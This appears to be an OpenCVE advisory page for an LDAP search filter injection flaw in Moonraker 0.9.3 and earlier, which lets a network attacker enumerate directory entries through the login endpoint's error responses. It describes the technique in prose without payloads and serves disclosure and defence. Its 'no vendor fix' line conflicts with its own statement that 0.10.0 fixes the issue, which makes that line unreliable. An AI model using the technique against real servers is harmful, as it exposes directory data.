Description
Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the "ldap" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0.
Published: 2026-01-22
Score: 2.7 Low
EPSS: < 1% Very Low
KEV: No
Impact: Information disclosure via LDAP search filter injection
Action: Upgrade
AI Analysis

Impact

Moonraker, a Python web server that provides API access for Klipper 3D printing firmware, allows an attacker to inject malformed LDAP search filters through the login endpoint when the ldap component is enabled. The server responds with a 401 error that indicates whether a search was successful, enabling an attacker to systematically brute‑force discovery of LDAP entries such as user IDs and attributes. This does not grant code execution but can compromise the confidentiality of sensitive directory data.

Affected Systems

Affected systems are Arksine Moonraker releases 0.9.3 and earlier when the ldap component is enabled. Users of these versions should review their configuration to confirm that LDAP integration is necessary.

Risk and Exploitability

The CVSS score of 2.7 reflects a low impact, and the EPSS score of less than 1% indicates a very low likelihood of exploitation. The vulnerability is not listed in CISA’s KEV catalog, suggesting no publicly known exploits. The likely attack vector is any user who can reach the login endpoint over the network, allowing an attacker to send crafted requests that reveal LDAP entries. The lack of elevated privileges or execution rights means the threat is limited to enumeration and information disclosure. Current mitigations rely on disabling the vulnerable component or applying the official patch.

Generated by OpenCVE AI on April 18, 2026 at 03:30 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the official patch by upgrading to Moonraker 0.10.0 or later
  • If LDAP functionality is unnecessary, disable the ldap component in the configuration to eliminate the vulnerable endpoint
  • Implement network segmentation or firewall rules to restrict access to the login endpoint as a temporary countermeasure

Generated by OpenCVE AI on April 18, 2026 at 03:30 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-3jqf-v4mv-747g Moonraker affected by LDAP search filter injection
History

Fri, 27 Feb 2026 14:00:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:arksine:moonraker:*:*:*:*:*:python:*:*
Metrics cvssV3_1

{'score': 5.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}

Fri, 23 Jan 2026 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 23 Jan 2026 16:45:00 +0000

Type Values Removed Values Added
First Time appeared Arksine
Arksine moonraker
Vendors & Products Arksine
Arksine moonraker

Thu, 22 Jan 2026 23:00:00 +0000

Type Values Removed Values Added
Description Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the "ldap" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0.
Title Moonraker with LDAP Enabled Allows Malicious Search Filter Injection
Weaknesses CWE-209
CWE-90
References
Metrics cvssV4_0

{'score': 2.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U'}

Subscriptions

Arksine Moonraker
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-01-23T20:03:49.510Z

Reserved: 2026-01-21T18:38:22.474Z

Link: CVE-2026-24130

cve-icon Vulnrichment

Updated: 2026-01-23T20:03:45.816Z

cve-icon NVD

Status : Analyzed

Published: 2026-01-22T23:15:58.477

Modified: 2026-02-27T13:57:16.400

Link: CVE-2026-24130

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T03:30:25Z

Weaknesses